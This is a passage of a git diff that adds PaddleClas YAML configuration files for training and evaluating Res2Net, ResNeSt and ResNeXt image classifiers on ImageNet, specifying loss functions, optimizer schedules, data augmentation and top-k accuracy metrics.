use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Res2Net50_14w_8s + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + 
topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_26w_4s.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_26w_4s.yaml new file mode 100644 index 0000000..31ad95e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_26w_4s.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Res2Net50_26w_4s + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - 
ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_vd_26w_4s.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_vd_26w_4s.yaml new file mode 100644 index 0000000..1157ac0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Res2Net/Res2Net50_vd_26w_4s.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: Res2Net50_vd_26w_4s + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: 
./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt101.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt101.yaml new file mode 100644 index 0000000..9daaac2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt101.yaml @@ -0,0 +1,131 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 
300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeSt101 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - 
ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt50.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt50.yaml new file mode 100644 index 0000000..24c82b5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt50.yaml @@ -0,0 +1,131 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeSt50 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: 
True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt50_fast_1s1x64d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt50_fast_1s1x64d.yaml new file mode 100644 index 0000000..e761cc2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeSt/ResNeSt50_fast_1s1x64d.yaml @@ -0,0 +1,131 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeSt50_fast_1s1x64d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: 
./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_32x4d.yaml new file mode 100644 index 0000000..4139308 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + 
save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 
0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_64x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_64x4d.yaml new file mode 100644 index 0000000..b911f9d --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_64x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_64x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.00015 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + 
cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_vd_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_vd_32x4d.yaml new file mode 100644 index 0000000..4ac6ab7 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_vd_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_vd_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# 
data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_vd_64x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_vd_64x4d.yaml new file mode 100644 index 0000000..1754e63 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt101_vd_64x4d.yaml @@ -0,0 +1,130 @@ +# global configs 
+Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt101_vd_64x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + 
resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_32x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_32x4d.yaml new file mode 100644 index 0000000..29f807e --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_32x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNeXt152_32x4d + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + 
dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_64x4d.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_64x4d.yaml new file mode 100644 index 0000000..94c91c0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ResNeXt/ResNeXt152_64x4d.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ 